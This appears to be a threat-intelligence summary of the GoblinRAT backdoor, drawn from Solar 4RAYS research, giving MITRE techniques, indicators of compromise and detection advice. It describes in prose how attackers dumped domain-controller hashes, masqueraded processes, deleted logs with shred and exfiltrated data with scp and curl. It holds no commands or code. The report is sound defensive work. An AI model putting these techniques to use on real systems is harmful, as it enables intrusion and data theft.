Keypoints
- Discovery began when a user hash dump from a domain controller was retrieved using “impacket-secretsdump,” prompting further investigation.
- Security researchers from Solar 4RAYS analyzed the incident and identified a novel backdoor named GoblinRAT.
- GoblinRAT operated covertly for about two years and primarily targeted organizations that provide services to government entities.
- The malware used compromised legitimate websites and DDNS providers to communicate with its command-and-control infrastructure.
- Persistence and stealth were achieved by mimicking legitimate services, modifying process names, running in memory, and using obfuscated libraries.
- Operators used native tools such as “shred” to remove logs and “scp” and “curl” to exfiltrate data from affected hosts.
- Reported IOCs include the domain qfilling.instanthq.com, IP 37.120.247.182, and multiple file hashes associated with GoblinRAT samples.
MITRE Techniques
- [T1003] Credential Dumping – Extracted user hashes from a domain controller using the “impacket-secretsdump” tool (‘user hash dump from a domain controller’, ‘impacket-secretsdump’)
- [T1071] Command and Control – Maintained communication with operators via compromised legitimate websites and dynamic DNS services (‘compromised legitimate websites and DDNS for command and control communication’)
- [T1055] Process Injection – Hid malicious activity by modifying process names and mimicking legitimate services on infected hosts (‘modifying process names to mimic legitimate services for stealth’)
- [T1041] Data Exfiltration – Transferred stolen data using standard utilities such as scp and curl to move files off compromised systems (‘scp and curl for exfiltrating data from compromised hosts’)
- [T1027] Obfuscated Files or Information – Employed obfuscated libraries and in-memory execution to make detection and analysis more difficult (‘obfuscated libraries’ and ‘running in memory’)
Indicators of Compromise
- [Domain] C2 infrastructure – qfilling.instanthq.com
- [IP Address] Observed C2 host – 37.120.247.182
- [File Hashes] Malicious samples linked to GoblinRAT – MD5: 3f9b1b506dfab7a5cc32004a45ed780d, SHA256: b074749f160453053989277e2eee3d1f31d618c0813f6379415a4727ed856806, and 1 more hash
In spring 2023, an IT company in Russia detected an unexpected dump of user hashes originating from a domain controller. The artifact was created using the impacket-secretsdump utility, and its presence sparked a deeper probe that ultimately involved the Solar 4RAYS research team. As investigators reconstructed the activity, they discovered a previously undocumented backdoor they named GoblinRAT. The implant had been active and evolving for roughly two years, maintaining a low profile while targeting organizations that provide services to government clients.
GoblinRAT’s operators relied on subtlety and deception rather than loud, destructive tactics. The malware communicated with its controllers through compromised but legitimate websites and dynamic DNS services, blending C2 traffic into normal-looking web requests. To avoid detection on host systems, the implant used obfuscated libraries and often executed components directly in memory, reducing its disk footprint. Operators also adopted naming conventions for tasks and files that resembled benign software, and they altered process names to mimic legitimate services so that routine monitoring would overlook them.
Persistence mechanisms for GoblinRAT included installing components that imitated standard services and modifying runtime artifacts to appear legitimate. The attackers used common administrative tools to complete their objectives: “shred” was observed being used to delete logs and erase traces, while “scp” and “curl” facilitated the extraction and transfer of stolen data. This reliance on native utilities helped the adversary blend activity into normal system operations and complicated automated detection efforts.
Solar 4RAYS’ analysis highlights that GoblinRAT is not a loud, opportunistic threat but a carefully managed toolset that emphasizes long-term access and stealth. The researchers traced communication infrastructure and sample hashes back to specific domains and IP addresses, and they tracked the malware’s evolution over multiple years. The combined use of compromised hosting, DDNS, obfuscation, in-memory execution, and native tools for cleanup and exfiltration paints a picture of an adversary focused on persistence and evasion rather than rapid disruption.
Organizations that support government entities or handle sensitive public-sector work should assume such targeted implants will attempt to hide within legitimate processes and traffic. Detection strategies should look beyond signature matches to behavioral indicators: unusual use of native tools for bulk transfers or log deletion, unexpected process name changes, in-memory execution patterns, and connections to the listed domains and IPs. Collecting and correlating endpoint telemetry with network logs can help surface the subtle signs that tools like GoblinRAT leave behind.
Read more: https://rt-solar.ru/solar-4rays/blog/4861/